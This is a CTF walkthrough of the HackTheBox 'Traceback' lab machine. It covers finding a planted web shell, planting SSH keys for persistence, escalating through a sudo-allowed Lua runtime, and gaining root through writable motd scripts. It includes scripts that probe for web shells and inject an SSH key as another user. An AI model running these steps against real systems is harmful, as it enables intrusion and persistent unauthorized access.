HackTheBox Traceback Writeup – 10.10.10.181

HackTheBox Traceback is a new Linux machine released on 14th March 2020. It is rated easy, and “easy” here is no exaggeration: first blood was taken about 15 minutes after release.

Like everyone else I tried my luck. Honestly it took me more than an hour to finish because I lost my way a couple of times, but the machine is neat and well made and I liked the way it was designed. Here is my writeup of Traceback – 10.10.10.181.

Let us start.

NMAP SCAN

As always, I started by adding the machine IP 10.10.10.181 to my hosts file as traceback.htb.

# root @ ns09 in ~/htb/traceback [17:35:45] 
$ nmap -T4 -A -p- -oS namp.scan traceback.htb 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-15 17:35 +03
Nmap scan report for traceback.htb (10.10.10.181)
Host is up (0.15s latency).
Not shown: 65483 closed ports, 50 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=3/15%OT=22%CT=1%CU=36624%PV=Y%DS=2%DC=T%G=Y%TM=5E6E3F4
OS:3%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 199/tcp)
HOP RTT       ADDRESS
1   153.81 ms 10.10.14.1
2   154.16 ms traceback.htb (10.10.10.181)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 508.85 seconds

Nmap finds only two open ports: SSH on 22 and HTTP on 80. The default page on port 80 says the website has been hacked, with the message: “I have left a backdoor for all the net. FREE INTERNETZZZ”

Looking at the page source told me what “backdoor” the hacker was talking about: there is a web shell somewhere on the site that we are meant to find.

A quick Google search for “best web shell” led me to a GitHub page that collects a number of web shells. Its description matches the HTML comment on the page, “Some of the best web shells that you might need ;)”, so I was fairly sure this collection is where the machine author's shell came from.

What I did next was a bit silly: I copied the web-shell filenames from that page one by one and requested each from the site to see whether it existed. None of them worked until the last but one, “smevk.php”, a web shell written by Kashif Khan.
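The one-by-one check can be scripted. This is an added example and not code from the writeup: it reads candidate filenames from a list (fill it from the web-shell collection you found; the handful of names in CANDIDATES below are placeholders I made up for illustration, not taken from the page) and reports every name the server answers with 200 or 403. The target http://traceback.htb is the hosts-file entry from above.

```shell
#!/bin/sh
# Added example, not the author's code: probe a site for each web-shell
# filename in a list, the automated form of the one-by-one check above.
# Assumptions: target is http://traceback.htb; CANDIDATES is a placeholder
# list to be replaced with the filenames from the web-shell collection.
set -u

# HTTP status code for a URL ("000" if curl cannot connect). Kept as a
# separate function so it can be swapped out for offline testing.
http_status() {
    curl -s -o /dev/null -w '%{http_code}' --max-time 10 "$1"
}

# Reads one filename per line from stdin and prints "<code> <url>" for each
# name the server answers with 200 (present) or 403 (present but blocked).
# Returns 0 if at least one candidate was found, 1 otherwise.
find_webshell() {
    base="${1%/}"
    hits=0
    while IFS= read -r name; do
        [ -z "$name" ] && continue
        code=$(http_status "$base/$name" || true)
        case "$code" in
            200|403)
                printf '%s %s\n' "$code" "$base/$name"
                hits=$((hits + 1))
                ;;
        esac
    done
    [ "$hits" -gt 0 ]
}

# Placeholder names (constructed for illustration); replace with the real list.
CANDIDATES='c99.php
r57.php
wso.php
b374k.php
smevk.php'

# Usage: sh find_webshell.sh http://traceback.htb
if [ "$#" -gt 0 ]; then
    printf '%s\n' "$CANDIDATES" | find_webshell "$1"
fi
```

A 403 is reported as well as a 200 because a shell that exists but is access-restricted is still a finding worth noting; everything else (404, 000) is silently skipped.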

Looking at its source code, the default username and password are admin:admin.

I logged-in and this was the web-shell control panel:

Web shells normally offer an execute option, and this one is no exception. A quick whoami showed the shell running as webadmin, not root. I then listed the files in the directory:

Building my own /home/webadmin/.ssh/authorized_keys on the machine

Once in, I took a small tour of the directories. I found an authorized_keys file in webadmin's home, so I decided to use it to get proper SSH access.

This was easy because the web shell has both execute and upload options. I generated a fresh SSH key pair on my Kali box, renamed id_rsa.pub to “authorized_keys” and uploaded it to the “/home/webadmin/.ssh/” directory. (Uploading under that name replaces whatever key was already there; appending your key to the existing file is the less intrusive option.)

Once the file was uploaded I ran ssh from my terminal and had a proper SSH session on the machine as webadmin.

Privilege escalation and Getting User.txt

Running sudo -l showed that webadmin may run /home/webadmin/luvit as sysadmin without a password. luvit is a Lua runtime (a binary, not a directory), so any Lua script passed to it executes as sysadmin. There is also a note in the home directory about a tool for practicing “Lua”.

# root @ ns09 in ~/htb/traceback [23:24:20] 
$ ssh -i /root/.ssh/id_rsa webadmin@10.10.10.181
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################
Welcome to Xh4H land 
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sun Mar 15 13:20:27 2020 from 10.10.14.8
webadmin@traceback:~$ id
uid=1000(webadmin) gid=1000(webadmin) groups=1000(webadmin),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)
webadmin@traceback:~$ 
webadmin@traceback:~$ sudo -l
Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/webadmin/luvit
webadmin@traceback:~$ ls
icyb3r.lua  luvit  note.txt  privesc.lua
webadmin@traceback:~$ cat note.txt
- sysadmin -
I have left this tool to practice Lua. Contact me if you have any question.
webadmin@traceback:~$ 

Going further, I read the two other files, icyb3r.lua and privesc.lua.

The .lua extension was new to me. A quick Google search informed me: “Lua is a powerful and fast programming language that is easy to learn and use and to embed into your application. Lua is designed to be a lightweight embeddable scripting language. It is used for all sorts of applications, from games to web applications and image processing.”

Nothing here requires writing real Lua. Since luvit runs whatever script I give it as sysadmin, all I need is a script that puts my public key into “/home/sysadmin/.ssh/authorized_keys” so I can SSH in as sysadmin.

This was easy: I opened privesc.lua with nano, replaced the SSH key it already contained with my own public key and saved it. Then I ran “sudo -u sysadmin /home/webadmin/luvit privesc.lua”.

Then I SSHed into the box as sysadmin, got the shell and grabbed user.txt.
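To make the sysadmin step reproducible, here is an added example, not the privesc.lua from the box (whose contents are not shown above). Run as webadmin, it generates a small Lua script and executes it through luvit via the sudo rule. It assumes the rule shown by sudo -l above, that luvit exposes the standard Lua io and os libraries, and that PUBKEY is a public key you generated locally with ssh-keygen; the key in the script is a placeholder, and the script filename addkey.lua is my choice so the box's own privesc.lua is left alone. It appends rather than overwrites, which is also the gentler way to handle the webadmin authorized_keys step earlier.

```shell
#!/bin/sh
# Added example, not the box's privesc.lua: write a Lua script that appends
# our public key to sysadmin's authorized_keys, then run it through the
# luvit binary that sudo lets webadmin execute as sysadmin.
# Assumptions: the sudo rule "(sysadmin) NOPASSWD: /home/webadmin/luvit",
# luvit exposes standard Lua io/os, and PUBKEY is a key generated locally
# (ssh-keygen -t ed25519 -f traceback_key). The key below is a placeholder.
set -u

PUBKEY="${PUBKEY:-ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDERKEY attacker@kali}"
DEST="${DEST:-/home/sysadmin/.ssh/authorized_keys}"
SCRIPT="${SCRIPT:-/home/webadmin/addkey.lua}"   # chosen name, avoids clobbering privesc.lua

# Emit Lua that creates ~/.ssh if needed, appends the key (keeping existing
# keys), and sets the permissions sshd's StrictModes expects.
make_privesc_lua() {
    key="$1"
    dest="$2"
    dir=$(dirname "$dest")
    cat <<EOF
local dir = "$dir"
local dest = "$dest"
os.execute("mkdir -p " .. dir .. " && chmod 700 " .. dir)
local f = assert(io.open(dest, "a"))
f:write("$key\n")
f:close()
os.execute("chmod 600 " .. dest)
EOF
}

# Write the script and execute it as sysadmin via the sudo rule.
run_as_sysadmin() {
    make_privesc_lua "$PUBKEY" "$DEST" > "$SCRIPT"
    sudo -u sysadmin /home/webadmin/luvit "$SCRIPT"
}

# Usage: sh addkey.sh        (prints the Lua for inspection)
#        sh addkey.sh run    (writes it and runs it as sysadmin)
# Afterwards: ssh -i traceback_key sysadmin@10.10.10.181
case "${1:-show}" in
    run) run_as_sysadmin ;;
    *)   make_privesc_lua "$PUBKEY" "$DEST" ;;
esac
```

The Lua opens the file in append mode and fixes the directory and file modes because sshd silently ignores an authorized_keys file that is group- or world-writable, which is the usual reason this kind of key drop "does not work".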

Privilege Escalation #2 and Getting The Root

With sysadmin privileges, I started looking around the box for anything useful.

After running pspy I noticed this:

Whenever a user logs in over SSH, “/bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/” runs as root, followed by “run-parts --lsbsysinit /etc/update-motd.d”.

The scripts are in the /etc/update-motd.d/ directory.

The point is that the scripts in /etc/update-motd.d run as root whenever a user logs in; they print the welcome banner. One of them, the release-upgrade check, fails because the box cannot reach changelogs.ubuntu.com (that is the “Failed to connect” line in the banner above), but the login continues regardless.

What I did was append my reverse-shell one-liner to the 00-header file, which sysadmin can write. Then I set up a listener, opened a new terminal, logged in as sysadmin over SSH, and boom, I was root. Note that the root copy from /var/backups/.update-motd.d puts the original scripts back, so the login has to happen soon after the edit.

That's it. Traceback was a fun and easy box, and I learned a couple of things. Thank you Xh4H for the nice build, and thank you for reading.

Appreciate your respect+ 🙂 here: https://www.hackthebox.eu/home/users/profile/68523

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n
